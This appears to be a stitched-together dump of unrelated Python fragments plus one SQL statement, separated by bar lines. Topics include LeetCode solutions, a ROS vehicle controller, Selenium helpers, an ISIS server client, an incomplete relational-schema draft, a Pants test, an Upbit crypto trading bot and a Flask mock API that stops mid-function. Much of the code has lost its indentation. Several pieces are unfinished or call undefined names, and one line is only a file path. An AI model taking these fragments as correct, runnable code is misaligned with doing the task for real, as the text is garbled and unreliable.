print('2 + 5 =', 2 + 5)
print('10 - 4 =', 10 - 4)
print('5 * 7 =', 5 * 7)
print('60 / 6 =', 60 / 6)
|
#Given a 32-bit signed integer, reverse the digits of the integer.
#Assume we are dealing with an environment which can only store integers within the 32-bit signed integer range:
#[-2**31, 2**31 - 1]. For the purpose of this problem, assume that your function returns 0 when the reversed
#integer overflows.
class Solution:
def reverse(self, x):
y = str(x)
if x < 0:
ans = int('-' + str(y[:0:-1]))
else:
ans = int(str(y[::-1]))
        if ans > 2**31 - 1 or ans < -2**31:
return 0
else:
return ans
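# Quick illustrative checks (not part of the original solution):
if __name__ == "__main__":
    s = Solution()
    print(s.reverse(123))         # 321
    print(s.reverse(-123))        # -321
    print(s.reverse(1534236469))  # 0 (the reversal overflows the 32-bit range)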
|
from pid import PID
from yaw_controller import YawController
from lowpass import LowPassFilter
import math
import rospy
GAS_DENSITY = 2.858
ONE_MPH = 0.44704
class Controller(object):
def __init__(self, *args, **kwargs):
# TODO: Implement
# self.steer_pid = PID( -1.0987, -0.0047, -7.4110, mn = -0.52, mx = 0.52 )
wheel_base = kwargs[ 'wheel_base' ]
steer_ratio = kwargs[ 'steer_ratio' ]
max_lat_accel = kwargs[ 'max_lat_accel' ]
max_steer_angle = kwargs[ 'max_steer_angle' ]
self.vehicle_mass = kwargs[ 'vehicle_mass' ]
self.fuel_capacity = kwargs[ 'fuel_capacity' ]
self.wheel_radius = kwargs[ 'wheel_radius' ]
self.decel_limit = kwargs[ 'decel_limit' ]
self.accel_limit = kwargs[ 'accel_limit' ]
self.brake_deadband = kwargs[ 'brake_deadband' ]
self.max_throttle = kwargs[ 'max_throttle' ]
self.max_brake = kwargs[ 'max_brake' ]
decel = math.fabs( self.decel_limit )
self.max_brake_value = ( self.vehicle_mass + self.fuel_capacity * GAS_DENSITY ) \
* decel * self.wheel_radius
self.last_cmd = None
min_speed = 0.0
self.yaw_controller = YawController( wheel_base, steer_ratio, min_speed, \
max_lat_accel, max_steer_angle )
# self.lowpass_filter = LowPassFilter( 0.5, 0.1 )
def control( self, proposed_linear_v, proposed_angular_v, current_linear_v, dbw_enable ):
# TODO: Change the arg, kwarg list to suit your needs
# Return throttle, brake, steer
throttle = 1.
brake = 0.
steer = 0.
if not dbw_enable:
self.last_cmd = None
return 0., 0., 0.
dv = math.fabs( current_linear_v - proposed_linear_v )
log = True
if proposed_linear_v > 0 and current_linear_v > 0 and dv < 0.05: # Reach proposed velocity
throttle = 0.
brake = 0.
self.last_cmd = None
if log:
rospy.loginfo( "[twist_controller] == NONE === %.2f - %.2f = %.2f, throttle = %.2f, brake = %.2f", \
proposed_linear_v, current_linear_v, proposed_linear_v - current_linear_v, throttle, brake )
elif self.last_cmd and proposed_linear_v > 0 and current_linear_v > 0 and dv < 0.5:
throttle, brake = self.last_cmd
if log:
rospy.loginfo( "[twist_controller] == KEEP === %.2f - %.2f = %.2f, throttle = %.2f, brake = %.2f", \
proposed_linear_v, current_linear_v, proposed_linear_v - current_linear_v, throttle, brake )
elif current_linear_v < proposed_linear_v:
throttle = 1. * self.max_throttle
brake = 0.
self.last_cmd = [ throttle, brake ]
if log:
rospy.loginfo( "[twist_controller] == Accr === %.2f - %.2f = %.2f, throttle = %.2f, brake = %.2f", \
proposed_linear_v, current_linear_v, proposed_linear_v - current_linear_v, throttle, brake )
else:
throttle = 0.
# decel = 0.5 # math.fabs( self.decel_limit )
# brake = ( self.vehicle_mass + self.fuel_capacity * GAS_DENSITY ) \
# * decel * self.wheel_radius
brake = 1. * self.max_brake * self.max_brake_value
self.last_cmd = [ throttle, brake ]
if log:
rospy.loginfo( "[twist_controller] == Dccr === %.2f - %.2f = %.2f, throttle = %.2f, brake = %.2f", \
proposed_linear_v, current_linear_v, proposed_linear_v - current_linear_v, throttle, brake )
steer = self.yaw_controller.get_steering( proposed_linear_v, proposed_angular_v, current_linear_v )
# if True:
# rospy.loginfo( "[twist_controller] throttle = %.2f, brake = %.2f, steer = %.2f", \
# throttle, brake, steer )
return throttle, brake, steer
|
'''
Interface to find all the dependencies of a package.
'''
import sys
import argparse
from depfinder.finder import find_deps, generate_requirements
def parse(args):
'''
Parses arguments using argparse
Parameters
----------
args: list of strings
argument options and values
Returns
---------
parsed_args: dict of strings
argument options are the keys and the accompanying
input are the values
'''
parser = argparse.ArgumentParser(description='Find and print to stdout'
+ ' all the dependencies of a'
+ ' package.')
parser.add_argument('-i', '--input', required=True,
help='Name of the query package.')
parsed_args = vars(parser.parse_args(args))
return parsed_args
if __name__ == '__main__':
args = parse(sys.argv[1:])
dependencies = find_deps(args['input'])
for req in generate_requirements(dependencies):
print(req)
|
"""
Write a Python function, check_anagram(), which accepts two strings and returns True if one string is an anagram of the other; otherwise it returns False.
Here the two strings are considered anagrams if they contain the same characters but no character occupies the same position in both strings. The strings must have the same length.
Also write the pytest test cases to test the program.
"""
#PF-Assgn-54
def check_anagram(data1,data2):
#start writing your code here
l1=[]
l2=[]
for i in data1.lower():
l1.append(i)
for i in data2.lower():
l2.append(i)
c=0
if len(data1)==len(data2):
for i in range(0,len(data1)):
if l1[i] in l2 and l1[i]!=l2[i]:
c=c+1
else:
return False
if len(data1)==c:
return True
else:
return False
print(check_anagram("About","table"))
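# A minimal pytest sketch (added here because the docstring above asks for test cases). The
# expectations below follow the position-shifted definition implemented by check_anagram.
def test_check_anagram_true_for_shifted_anagrams():
    assert check_anagram("abc", "cab")
    assert check_anagram("stop", "pots")
def test_check_anagram_false_when_a_character_keeps_its_position():
    assert not check_anagram("abc", "abc")
def test_check_anagram_false_for_different_lengths():
    assert not check_anagram("abc", "ab")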
|
# -*- coding: utf-8 -*-
from PIL import Image
from django.core.files import File
from selenium import webdriver
import datetime
import os
import tempfile
def make_screenshot(screenshot):
    # get screenshot
    driver = webdriver.Firefox()
    driver.get(screenshot.url)
    fd, filename = tempfile.mkstemp('.png')
    os.close(fd)
    driver.save_screenshot(filename)
    # capture the page title before closing the browser window
    screenshot.title = driver.title
    driver.close()
    # save the saved date and the image (open the PNG in binary mode)
    screenshot.saved = datetime.datetime.now()
    fileobj = File(open(filename, 'rb'))
    screenshot.image.save(filename, fileobj)
# save thumbnail
fd2, thumbnail_filename = tempfile.mkstemp('.png')
os.close(fd2)
image = Image.open(filename)
cropped = image.crop((0, 0, 260*2, 180*2))
cropped.thumbnail((260, 180), Image.ANTIALIAS)
cropped.save(thumbnail_filename)
    fileobj = File(open(thumbnail_filename, 'rb'))
screenshot.thumbnail.save(thumbnail_filename, fileobj)
|
#! /usr/bin/python3
from matplotlib import pyplot as plt
from matplotlib import dates as mdates
import matplotlib.ticker as ticker
import sys
class Item:
#Item class constructor
def __init__(self,ID,name,key,log,host_name,units):
self.ID = ID
self.name = name
self.host_name = host_name
self.key = key
self.log = log
self.x = []
self.y = []
self.units = units
#Function which creates plots and saves them in tmp directory (changed in Report class)
def gen_graph(self):
self.log.append(2,'Generating {} graph'.format(self.name))
dates = mdates.date2num(self.x)
plt.figure(figsize=(20,5))
plt.plot_date(dates,self.y,'r')
plt.title(self.name)
option = sys.argv[1:]
option = option[0]
if option == '-d':
loc = mdates.HourLocator(interval=1)
fmt = mdates.DateFormatter('%H:%M')
label = 'Time [h:m]'
elif option == '-m':
loc = mdates.DayLocator(interval=1)
fmt = mdates.DateFormatter('%m.%d')
label = 'Day [m.d]'
        elif option == '-w':
            loc = mdates.DayLocator(interval=1)
            fmt = mdates.DateFormatter('%d')
            label = 'Day [d]'
        else:
            raise ValueError("Unsupported option '{}': expected -d, -m or -w".format(option))
plt.gca().xaxis.set_major_formatter(fmt)
plt.gca().xaxis.set_major_locator(loc)
plt.ticklabel_format(axis='y',style='plain')
plt.gca().yaxis.set_major_formatter(ticker.EngFormatter(unit=self.units))
plt.grid()
plt.xlabel(label)
if self.units == '':
plt.ylabel('[amount]')
plt.gca().yaxis.set_major_locator(ticker.MaxNLocator(integer=True))
else:
plt.ylabel('['+self.units+']')
plt.savefig(self.ID+'.jpg')
plt.close()
|
import lasagne
import numpy as np
from braindecode.veganlasagne.layers import transform_to_normal_net
def get_layers(layers_or_layer_obj):
"""Either return layers if already a list or call get_layers function
of layer object."""
if hasattr(layers_or_layer_obj, '__len__'):
return layers_or_layer_obj
else:
return layers_or_layer_obj.get_layers()
class JustReturn(object):
def __init__(self, layers):
self.layers = layers
def get_layers(self):
return get_layers(self.layers)
class TransformToNormalNet(object):
def __init__(self, layers):
self.layers = layers
def get_layers(self):
layers = get_layers(self.layers)
final_layer = layers[-1]
assert len(np.setdiff1d(layers,
lasagne.layers.get_all_layers(final_layer))) == 0, ("All layers "
"should be used, unused {:s}".format(str(np.setdiff1d(layers,
lasagne.layers.get_all_layers(final_layer)))))
transformed = transform_to_normal_net(final_layer)
return lasagne.layers.get_all_layers(transformed)
|
print('CHALLENGE 01')
nome = input("Hello, what is your name? ")
print('Welcome,', nome, '! Nice to meet you!')
|
import json
from contextlib import closing
from urllib.error import URLError, HTTPError
from urllib.request import urlretrieve
from os.path import basename
from time import time
import requests
from urllib.parse import quote_plus as url_quote
from logging import getLogger
def _catch_err(req):
if not req.ok:
err = "Server responded with {}".format(req.status_code)
if req.headers.get("content-type").startswith("application/json"):
req_json = req.json()
if "message" in req_json.keys():
err = "Server responded with {}: {}".format(
req.status_code,
req_json["message"]
)
raise RuntimeError(err)
class ISISClient:
logger = getLogger("ISISClient")
    # download chunk size in bytes (roughly 64 KB)
    _DL_CHUNK_SIZE = 64000
def __init__(self, server_addr: str):
self._server_addr = server_addr
def _file_url(self, file_path):
file_path = url_quote(file_path)
return "/".join([self._server_addr, "files", file_path])
def _label_url(self, file_path):
return "/".join([self._file_url(file_path), "label"])
def program(self, command: str):
return ISISRequest(self._server_addr, command)
def download(self, remote_path, local_path):
return ISISClient.fetch(self._file_url(remote_path), local_path)
def delete(self, remote_path):
remote_url = self._file_url(remote_path)
ISISClient.logger.debug("Deleting {}...".format(remote_url))
r = requests.delete(remote_url)
_catch_err(r)
ISISClient.logger.debug("{} deleted successfully".format(remote_url))
def label(self, remote_path):
remote_url = self._label_url(remote_path)
ISISClient.logger.debug("Retrieving label for {}...".format(remote_url))
r = requests.get(remote_url)
_catch_err(r)
ISISClient.logger.debug("Label for {} retrieved successfully".format(remote_url))
return r.json()
@staticmethod
def fetch(remote_url, download_path):
ISISClient.logger.debug("Downloading {}...".format(remote_url))
start_time = time()
# urlretrieve can do both http & ftp
try:
urlretrieve(remote_url, download_path)
except HTTPError as e:
err_msg = "Server returned {}: {}".format(e.code, e.reason)
raise RuntimeError(err_msg)
except URLError as e:
err_msg = "Server returned '{}'".format(e.reason)
raise RuntimeError(err_msg)
log_msg = "{} downloaded to {} (took {:.1f}s)".format(
remote_url,
download_path,
time() - start_time
)
ISISClient.logger.debug(log_msg)
class ISISRequest:
def __init__(self, server_url: str, program: str):
self._server_url = server_url
self._program = program
self._args = dict()
self._files = dict()
self._remotes = list()
self._logger = getLogger(program)
def add_arg(self, arg_name, arg_value, is_remote=False):
self._args[arg_name] = arg_value
if is_remote:
self._remotes.append(arg_name)
return self
def add_file_arg(self, arg_name, file_path):
self._files[arg_name] = file_path
return self
def send(self):
self._logger.debug("Starting...")
start_time = time()
file_uploads = dict()
command_args = {**self._args}
for arg_name, file_path in self._files.items():
file_name = basename(file_path)
file_uploads[file_name] = open(self._files[arg_name], 'rb')
command_args[arg_name] = file_name
if len(file_uploads.keys()) > 0:
r = requests.post(
"/".join([self._server_url, "files"]),
files=file_uploads
)
_catch_err(r)
cmd_req = {
"program": self._program,
"args": command_args,
"remotes": self._remotes
}
r = requests.post(
"/".join([self._server_url, "isis"]),
json=cmd_req
)
try:
_catch_err(r)
except RuntimeError as e:
self._logger.error(json.dumps(cmd_req))
raise e
self._logger.debug("Took {:.1f}s".format(time() - start_time))
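# A minimal usage sketch (illustrative only -- the server address, file names and ISIS program
# below are assumptions, not part of the original module):
if __name__ == "__main__":
    client = ISISClient("http://localhost:8080")
    req = client.program("isis2std")  # any ISIS program the server exposes
    req.add_file_arg("from", "input.cub")
    req.add_arg("to", "output.png", is_remote=True)
    req.send()  # raises RuntimeError if the server reports an error
    client.download("output.png", "output.png")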
|
"""
A Schema is a more general container for Python objects.
In addition to tracking relationships between objects,
it can also keep other kind of indexing structures.
Will need a more flexible query object that can represent
comparisons.
NOTE -- not sure if this is really worth it since it only
kicks in with relatively large amounts of data.
At that point, would it be better to just use SQLite anyway?
A M2M can be used to store a reverse mapping of
attribute : column values.
For something like "index foo.bar" followed by
"select foo where bar = 1" this is sufficient.
Range queries require an additional structure --
maybe ManyToMany that uses a SortedDict for one of its directions?
(SortedDict alone wouldn't be able to support fast deletes.)
What about indices over many or combinations?
This would basically be the same thing, with multiple values.
E.g. index of (a.b, a.c) is... just an M2M or M2MS of
{a: (a.b, a.c)}
"""
from . import relativity
class Schema(object):
def __init__(self, cols):
self.col_vals = {col: set() for col in cols}
# column label to set-of-values
self.rels = {}
# relationships among columns
self.col_users = {col: set() for col in cols}
# relationships / indices / etc that make use of cols
def add_col(self, col):
assert col not in self.col_vals
self.col_vals[col] = set()
self.col_users[col] = []
def remove_col(self, col):
assert col in self.col_vals
if self.col_users[col]:
raise ValueError('cannot remove {}, still in use by {}'.format(
col, self.col_users[col]))
def add(self, col, val):
self.col_vals[col].add(val)
def remove(self, col, val):
self.col_vals[col].remove(val)
class RelDB(object):
"""
RelDB = Schema + data
"""
    def __init__(self, cols):
        self.schema = Schema(cols)
        self.col_vals = {col: set() for col in cols}
        # column label to set-of-values
        self.rels = {}
        # relationships among columns
        self.col_users = {col: set() for col in cols}
        # relationships / indices / etc that make use of cols (needed by add_col / remove_col below)
def add(self, col, val):
self.col_vals[col].add(val)
def remove(self, col, val):
self.col_vals[col].remove(val)
# TODO: pub-sub linking schema mutations to RelDB
def add_col(self, col):
"""
column labels aren't limited to strings -- any
hashable python object will do;
just keep in mind that if one column label is a tuple
of other column labels it will lead to ambiguous queries
"""
assert col not in self.col_vals
self.col_vals[col] = set()
self.col_users[col] = []
def remove_col(self, col):
assert col in self.col_vals
if self.col_users[col]:
raise ValueError('cannot remove {}, still in use by {}'.format(
col, self.col_users[col]))
def add_relationship(self, col_a, col_b):
"""
create an (initially empty) relationship between two columns
"""
assert col_a in self.col_vals
assert col_b in self.col_vals
        self.rels[col_a, col_b] = fwd = relativity.M2M()
self.rels[col_b, col_a] = fwd.inv
    def __getitem__(self, key):
        if key in self.col_vals:
            return self.col_vals[key]
if type(key) is tuple:
pass
if key is Ellipsis:
# iterate over all unique tuples in some order?
raise KeyError()
class View(object):
__slots__ = ('reldb', 'schema_ver')
"""
    A View is a live attachment to some subset of the data
inside a RelDB; Views allow for more focused read/write APIs
"""
# this is only to provide isinstance() checks for users
class _RelView(View):
"""
View of a single relationship
This is basically an M2M.
"""
__slots__ = ('lhs_col', 'rhs_col')
def __init__(self, reldb, lhs_col, rhs_col):
assert lhs_col in reldb.cols
assert rhs_col in reldb.cols
self.lhs_col, self.rhs_col, self.reldb = lhs_col, rhs_col, reldb
self.schema_version = self.reldb.schema.ver
    def add(self, key, val):
        # the original statement here was left unfinished; completing it as a simple
        # membership check against the lhs column's value set (an assumed completion)
        if key not in self.reldb.col_vals[self.lhs_col]:
            raise KeyError(key)
# what is the structure of a Query?
# (M2M, [M2M, M2M], ..., M2M)
# tuple of M2Ms -- anything inside a list = not part of output
# multi layer sub-list = multiple paths
# a paths is something like (col, [col, col], ..., col)
class _Query(object):
"""
    represents an abstract query; not intended to be instantiated directly,
should be created by methods / getitem of DB
"""
__slots__ = ('cols', 'path', 'database', 'schema_version', 'grouped_by', 'sorted_on')
# cols - the columns that will be output (must be part of path)
# path - the join path through the DB that will be walked
# database - the RelDB over which the query will be evaluated
# schema_version - integer schema version
# grouped_by - subset of cols which will be combined into tuples as keys (?)
# -- an alternative interpretation of grouped_by is anything NOT grouped by must be aggregated,
# perhaps with an implicit / default aggregation being "build a list of"
# sorted_on - subset of cols that will be used to sort
def __init__(self, cols, path, database):
self.cols, self.path, self.database = cols, path, database
self.schema_version = database.schema.version
self.grouped_by = self.sorted_on = ()
def groupby(self, cols):
assert set(cols) < set(self.cols)
assert not set(cols) & set(self.grouped_by)
ret = _Query(self.cols, self.path, self.database)
ret.grouped_by += cols
return ret
def sort(self, cols):
assert set(cols) < set(self.cols)
assert not set(cols) & set(self.sorted_on)
ret = _Query(self.cols, self.path, self.database)
ret.sorted_on += cols
return ret
def validate(self, database):
assert set(self.cols) <= set(self.path)
class _ResultSet(object):
"""
    a resultset obtained by executing a query; not intended to be constructed
    directly; it should be built by a _Query
"""
__slots__ = ('query', 'results')
def __init__(self, query):
if query.database.schema.version != query.schema_version:
pass # re-validate that query is still valid
        # evaluate the query against its database
self.results = fetch() # ...
def __iter__(self):
return iter(self.results)
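# An illustrative sketch (not part of this module) of the reverse-mapping idea from the module
# docstring: a plain dict of value -> set-of-row-positions stands in for the M2M, which is
# enough to answer "index foo.bar" / "select foo where bar = 1" style lookups.
def _demo_reverse_index():
    rows = [{'bar': 1, 'name': 'a'}, {'bar': 2, 'name': 'b'}, {'bar': 1, 'name': 'c'}]
    index = {}  # value of 'bar' -> set of row positions
    for pos, row in enumerate(rows):
        index.setdefault(row['bar'], set()).add(pos)
    # "select foo where bar = 1"
    return [rows[pos] for pos in sorted(index.get(1, ()))]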
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from textwrap import dedent
import pytest
from pants.backend.build_files.fmt.buildifier.rules import BuildifierRequest
from pants.backend.build_files.fmt.buildifier.rules import rules as buildifier_rules
from pants.backend.codegen.protobuf.target_types import rules as target_types_rules
from pants.core.goals.fmt import FmtResult
from pants.core.util_rules import external_tool
from pants.engine.fs import PathGlobs
from pants.engine.internals.native_engine import Snapshot
from pants.testutil.rule_runner import QueryRule, RuleRunner
class Materials:
def __init__(self, **kwargs):
pass
@pytest.fixture
def rule_runner() -> RuleRunner:
return RuleRunner(
rules=[
*buildifier_rules(),
*external_tool.rules(),
*target_types_rules(),
QueryRule(FmtResult, [BuildifierRequest.Batch]),
],
# NB: Objects are easier to test with
objects={"materials": Materials},
)
GOOD_FILE = dedent(
"""\
materials(
drywall = 40,
status = "paid",
studs = 200,
)
"""
)
BAD_FILE = dedent(
"""\
materials(status='paid', studs=200, drywall=40)
"""
)
def run_buildifier(rule_runner: RuleRunner) -> FmtResult:
rule_runner.set_options(
["--backend-packages=pants.backend.build_files.fmt.buildifier"],
env_inherit={"PATH", "PYENV_ROOT"},
)
snapshot = rule_runner.request(Snapshot, [PathGlobs(["**/BUILD"])])
fmt_result = rule_runner.request(
FmtResult,
[
BuildifierRequest.Batch("", snapshot.files, partition_metadata=None, snapshot=snapshot),
],
)
return fmt_result
def test_passing(rule_runner: RuleRunner) -> None:
rule_runner.write_files({"BUILD": GOOD_FILE})
fmt_result = run_buildifier(rule_runner)
assert fmt_result.output == rule_runner.make_snapshot({"BUILD": GOOD_FILE})
assert fmt_result.did_change is False
def test_failing(rule_runner: RuleRunner) -> None:
rule_runner.write_files({"BUILD": BAD_FILE})
fmt_result = run_buildifier(rule_runner)
assert fmt_result.output == rule_runner.make_snapshot({"BUILD": GOOD_FILE})
assert fmt_result.did_change is True
def test_multiple_files(rule_runner: RuleRunner) -> None:
rule_runner.write_files({"good/BUILD": GOOD_FILE, "bad/BUILD": BAD_FILE})
fmt_result = run_buildifier(rule_runner)
assert fmt_result.output == rule_runner.make_snapshot(
{"good/BUILD": GOOD_FILE, "bad/BUILD": GOOD_FILE}
)
assert fmt_result.did_change is True
|
SomaIdade = 0
MaisVelho = 0
ContMulher = 0
NomeVelho = ''
for c in range(1,5):
    print(5*'-' + ' PERSON {}'.format(c) + 5*'-')
    Nome = str(input('Name: '))
    Idade = int(input('Age: '))
    Sexo = str(input('Sex [M/F]: ')).upper().strip()
    print(Sexo)
    SomaIdade += Idade
    if Sexo == 'M':
        if MaisVelho < Idade:
            MaisVelho = Idade
            NomeVelho = Nome
    if Sexo == 'F' and Idade < 20:
        ContMulher += 1
print('The average age of the group is {}'.format(SomaIdade/4))
print('The oldest man is {} years old and his name is {}'.format(MaisVelho, NomeVelho))
print('In total there are {} women under 20 years old'.format(ContMulher))
|
import time
import pyupbit
import datetime
import requests
access = "your-access"
secret = "your-secret"
myToken = "slack-token"
def post_message(token, channel, text):
"""슬랙 메시지 전송"""
response = requests.post("https://slack.com/api/chat.postMessage",
headers={"Authorization": "Bearer "+token},
data={"channel": channel,"text": text}
)
def get_target_price(ticker, k):
"""변동성 돌파 전략으로 매수 목표가 조회"""
df = pyupbit.get_ohlcv(ticker, interval="day", count=2)
target_price = df.iloc[0]['close'] + (df.iloc[0]['high'] - df.iloc[0]['low']) * k
return target_price
def get_day_target(ticker, t):
"""Day Trading 전략으로 매수 목표가 설정"""
df = pyupbit.get_ohlcv(ticker, interval="day", count=2)
day_target = df.iloc[0]['open'] * t
return day_target
def get_start_time(ticker):
"""시작 시간 조회"""
df = pyupbit.get_ohlcv(ticker, interval="day", count=1)
start_time = df.index[0]
return start_time
def get_ma(ticker):
"""15일 이동 평균선 조회"""
df = pyupbit.get_ohlcv(ticker, interval="day", count=15)
ma = df['close'].rolling(15).mean().iloc[-1]
return ma
def get_bbc(ticker):
    """Get the 20-day moving average."""
    df = pyupbit.get_ohlcv(ticker, interval="day", count=20)
    ma20 = df['close'].rolling(20).mean().iloc[-1]
    return ma20
def get_balance(coin):
"""잔고 조회"""
balances = upbit.get_balances()
for b in balances:
if b['currency'] == coin:
if b['balance'] is not None:
return float(b['balance'])
else:
return 0
def get_current_price(ticker):
    """Get the current price."""
    return pyupbit.get_orderbook(tickers=ticker)[0]["orderbook_units"][0]["ask_price"]
# log in
upbit = pyupbit.Upbit(access, secret)
print("autotrade start")
# send the start message to Slack
post_message(myToken,"#crypto", "autotrade start")
while True:
try:
now = datetime.datetime.now()
start_time = get_start_time("KRW-XRP")
end_time = start_time + datetime.timedelta(days=1)
if start_time < now < end_time - datetime.timedelta(seconds=10):
target_price = get_target_price("KRW-XRP", 0.1)
ma5 = get_ma("KRW-XRP")
current_price = get_current_price("KRW-XRP")
if target_price < current_price and ma5 < current_price:
krw = get_balance("KRW")
if krw > 5000:
buy_result = upbit.buy_market_order("KRW-XRP", krw*0.9995)
post_message(myToken,"#crypto", "XRP buy : " +str(buy_result))
else:
xrp = get_balance("XRP")
day_price = get_day_target("KRW-XRP", 1.125)
if xrp > 1 or current_price == day_price:
sell_result = upbit.sell_market_order("KRW-XRP", xrp*0.995)
post_message(myToken,"#crypto", "XRP sell : " +str(sell_result))
time.sleep(1)
except Exception as e:
print(e)
post_message(myToken,"#crypto", e)
time.sleep(1)
|
from selenium import webdriver
class LoginPage():
# locate all the elements of page
textbox_username_id = "Email"
textbox_password_id = "Password"
button_login_xpath = "/html/body/div[6]/div/div/div/div/div[2]/div[1]/div/form/div[3]/input"
link_logout_linktext = "Logout"
def __init__(self,driver):
self.driver = driver
def setUserName(self,username):
self.driver.find_element_by_id(self.textbox_username_id).send_keys(username)
def setPassword(self,password):
self.driver.find_element_by_id(self.textbox_password_id).send_keys(password)
def clickLogin(self):
self.driver.find_element_by_xpath(self.button_login_xpath).click()
def clickLogout(self):
        self.driver.find_element_by_link_text(self.link_logout_linktext).click()
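# A minimal page-object usage sketch (illustrative only -- the URL and credentials are
# placeholders, not from the original source):
if __name__ == "__main__":
    driver = webdriver.Chrome()
    driver.get("https://example.com/admin/login")  # hypothetical login page
    login_page = LoginPage(driver)
    login_page.setUserName("admin@example.com")
    login_page.setPassword("password123")
    login_page.clickLogin()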
|
UPDATE salary SET sex = CASE WHEN sex = 'm' THEN 'f' ELSE 'm' END;
|
'''Task 1. Check whether a word starts and ends
with the same letter.
[in]--> lol
[out]--> True
!!!
[in]---> c
[out]---> False (!!!!!!!!!)
'''
message = input('Enter something: ').strip().lower()
# store the input message and strip any surrounding whitespace
if len(message) > 1:
    print(message[0] == message[-1])
else:
    print('Enter more than one letter!')
|
from decouple import config, Csv
class Settings:
TELEGRAM_TOKEN = config('TELEGRAM_TOKEN', default='')
ADMIN_USERNAMES = config('ADMIN_USERNAMES', default='', cast=Csv())
SENTENCE_COMMAND = config('SENTENCE_COMMAND', default='sentence')
REMOVE_COMMAND = config('REMOVE_COMMAND', default='remove')
VERSION_COMMAND = config('VERSION_COMMAND', default='version')
FLUSH_COMMAND = config('FLUSH_COMMAND', default='flush')
DATABASE_URL = config('DATABASE_URL', default='sqlite:///:memory:')
MODEL_CACHE_TTL = config('MODEL_CACHE_TTL', default='300', cast=int)
COMMIT_HASH = config('HEROKU_SLUG_COMMIT', default='not set')
MESSAGE_LIMIT = config('MESSAGE_LIMIT', default='5000', cast=int)
MESSAGES_TABLE_NAME = config('MESSAGES_TABLE_NAME', default='messages')
LOG_LEVEL = config('LOG_LEVEL', default='INFO')
ADMIN_CHAT_ID = config('ADMIN_CHAT_ID', default='')
FILTERS = config('FILTERS', default='', cast=Csv())
settings = Settings()
|
/Users/daniel/anaconda/lib/python3.6/genericpath.py
|
import pandas as pd
import numpy as np
# Read the dataset into a data table using Pandas
df = pd.read_csv("ratings.csv", dtype={'userId': np.int32, 'movieId': np.int32, 'rating': np.uint8})
# Convert the running list of user ratings into a matrix using the 'pivot table' function
ratings_df = pd.pivot_table(df, index='userId', columns='movieId', aggfunc=np.max)
# Create a csv file of the data for easy viewing
ratings_df.to_csv("review_matrix.csv", na_rep="")
|
"""
2nd attempt: DP, learned from others
the idea is to divide the problem into subproblems:
for each amount, calculate the number of different combinations using the results for smaller amounts
e.g.
dp[amount] = dp[amount] + dp[amount-coin]
dp[4] = 1 + dp[2]
this means 4 can be made up as 1+1+1+1 plus the combinations counted in dp[2] (which are 1+1 and 2)
therefore
dp[4] = 1 + 2 = 3
see ./explanation.jpeg
Time O(N * A)
Space O(N)
192 ms, faster than 46.52%
"""
class Solution(object):
def change(self, amount, coins):
"""
:type amount: int
:type coins: List[int]
:rtype: int
"""
dp = (amount+1)*[0]
dp[0] = 1
for i in range(len(coins)):
coin = coins[i]
for j in range(1, amount+1):
if j - coin >= 0:
dp[j] += dp[j-coin]
return dp[amount]
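# Illustrative check mirroring the example in the docstring (not from the original file):
if __name__ == "__main__":
    print(Solution().change(4, [1, 2]))  # 3 -> {1+1+1+1, 1+1+2, 2+2}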
|
import numpy as np
# Sigmoid function
# y = 1 / (1 + exp(-x))
# Smoothly approximates the discontinuous step function.
def sigmoid(input):
return 1 / (1 + np.exp(-input))
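# Quick illustrative check (not part of the original file): values far from 0 approach the
# step function, while sigmoid(0) is exactly 0.5.
if __name__ == "__main__":
    print(sigmoid(np.array([-10.0, 0.0, 10.0])))  # ~[0.000045, 0.5, 0.999955]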
|
import re
import difflib
import string
import pandas as pd
from datetime import datetime
from functools import wraps
from flask import Flask, request, jsonify
from jsonschema import validate, ValidationError, FormatChecker
from enlevement_vehicule import SCHEMA_ENLEVEMENT_VEHICULE
from entite_remettante import SCHEMA_ENTITE_REMETTANTE
from lieu_depot import SCHEMA_LIEU_DEPOT
from recuperation_bien import SCHEMA_RECUPERATION_BIEN
from remise_domaine import SCHEMA_REMISE_DOMAINE
from utils import random_string, HERMES_STATUT, extract_datetime
app = Flask(__name__)
def process_request(old_func):
@wraps(old_func)
def new_func(*args, **kwargs):
try:
raw_response = old_func(*args, **kwargs)
app.logger.info("Returning response: " + str(raw_response))
return jsonify(raw_response)
except ValidationError as e:
return jsonify({
"code": 400,
"message": "La requête transmise est incorrecte (voir section détail). Veuillez vérifier et soumettre à nouveau votre demande.",
"horodatage": datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ"),
"detail": [{
"id": random_string(10, string.digits),
"errors": [{
"code": "Invalid json: " + e.message,
"message": re.sub('\n+', '\n', str(e))
}]
}]
}), 400
return new_func
def validate_body(schema: dict):
def decorator(old_func):
@wraps(old_func)
def new_func(*args, **kwargs):
request_data = request.json
app.logger.info("Receiving body: " + str(request_data))
validate(instance=request_data, schema=schema, format_checker=FormatChecker())
return old_func(request_data, *args, **kwargs)
return new_func
return decorator
@app.route('/hmsa/api/v1/referentiels/entitesremettantes', methods=['POST'])
@process_request
@validate_body(SCHEMA_ENTITE_REMETTANTE)
def entite_remettante(data):
return [{
"idCorrelation": entite['idCorrelation'],
"id": random_string(10, string.digits)
} for entite in data]
@app.route('/hmsa/api/v1/referentiels/lieux-de-depot', methods=['POST'])
@process_request
@validate_body(SCHEMA_LIEU_DEPOT)
def lieu_depot(data):
return [{
"idCorrelation": entite['idCorrelation'],
"id": random_string(10, string.digits)
} for entite in data]
@app.route('/hmsa/api/v1/vehicules', methods=['POST'])
@process_request
@validate_body(SCHEMA_REMISE_DOMAINE)
def remise_domaine(data):
new_bien = {
"id_correlation": data['idCorrelation'],
"id": int(random_string(10, string.digits))
}
dataframe = read_dataframe()
dataframe = dataframe.append(new_bien, ignore_index=True)
save_dataframe(dataframe)
return {
**new_bien,
"dateDemandePriseEnCharge": datetime.now().isoformat(),
}
@app.route('/hmsa/api/v1/vehicules/_search', methods=['POST'])
@process_request
@validate_body(SCHEMA_RECUPERATION_BIEN)
def recuperation_biens(data):
date_debut = extract_datetime(data['dateDebut'])
date_fin = extract_datetime(data['dateFin'])
df = read_dataframe()
df['dateMaj'] = pd.to_datetime(df['dateMaj'])
mask = (df['dateMaj'] > date_debut) & (df['dateMaj'] < date_fin)
df = df.loc[mask]
return [{
"idCorrelation": row['id_correlation'],
"id": row['id'],
"statut": row['statut'],
"dateReception": datetime.now().isoformat(),
"dateQualification": "2021-03-04",
"dateVente": "2021-03-04",
"datePaiement": "2021-03-04",
"raisonSocialeSociete": None,
"prenomClient": None,
"nomClient": None,
